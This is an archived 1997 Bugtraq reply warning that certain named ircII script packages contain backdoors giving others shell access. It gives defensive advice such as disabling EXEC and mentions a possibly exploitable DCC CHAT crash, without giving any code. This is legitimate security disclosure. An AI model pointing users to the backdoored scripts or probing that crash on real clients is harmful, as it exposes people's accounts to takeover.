Bugtraq mailing list archives
Re: IRC script trojan with Unix based clients
From: espel () LLAIC UNIV-BPCLERMONT FR (Roger Espel Llima)
Date: Mon, 2 Jun 1997 17:40:24 +0200
On Sun, Jun 01, 1997 at 11:20:40AM -0700, Leonid S Knyshov wrote:
As of this moment, the only good sources for ircII scripts are at ftp://ftp.pimpz.org and ftp://bitchx.htoc.com
You can trust the scripts from there.
pimpz.org has all of DeadelviS's archive, which is quite comprehensive but not free (or meant to be free) of scripts with backdoors. For example, running ftp://ftp.pimpz.org/irc/DeadelviS/script/paks/toolz.irc, or ftp://ftp.pimpz.org/irc/DeadelviS/script/paks/dreamscr_9.3.tar.gz is equivalent to giving access to your shell account to everyone else on IRC.
From that directory, deturbo, superpak, uus and zer0 are the ones I'd
trust. Still, it's a bad idea to run a script you don't completely understand. I couldn't find a single script on the bitchx.htoc.com site, it appears to be all about the BitchX client, source and binaries.
Meanwhile, an ircII script can be as powerful as a shell, please check on http://www.undernet.org the important FAQ file how to detect ircII backdoors, I believe its also on pimpz.org ftp site.
I wrote that :) http://www.eleves.ens.fr:8080/home/espel/irc-backdoor.faq ftp://ftp.pimpz.org/irc/DeadelviS/misc/irc-backdoor.faq it's a bit outdated, though.
You might want to hack a client source a bit to disable DCC and/or CTCP commands. To be safe you can simply rename them adn retain the functionality.
The command to disable if you're concerned about security is EXEC, mostly. CTCP is harmless, it just sends and reacts to messages with a special marker. If you're paranoid, disable DCC SEND and DCC GET too, but they're generally OK because they'll refuse to write to dotfiles. DCC CHAT is an order of magnitude safer than that, but you can get some versions of ircII to dump core by sending crap through a DCC CHAT, there might be an exploitable buffer overflow somewhere there (although it's most likely in the data segment). Even if you remove EXEC, and whatever you do to the client itself (unless you remove LOAD, but that's crippling it quite a bit), you can't prevent people from loading backdoored scripts that will let other people have "IRC access", i.e remotely control the client. From the point of view of the system's security, though, as long as the backdoor can't touch the shell, it's not too bad. Roger -- e-mail: espel () llaic univ-bpclermont fr, espel () unix bigots org WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html
Current thread:
- Re: IRC script trojan with Unix based clients Leonid S Knyshov (Jun 01)
- Re: IRC script trojan with Unix based clients Roger Espel Llima (Jun 02)
- Re: IRC script trojan with Unix based clients Alan Brown (Jun 02)
- AIX Security APARs Aleph One (Jun 02)
- <Possible follow-ups>
- Re: IRC script trojan with Unix based clients Paul Roberts (Jun 02)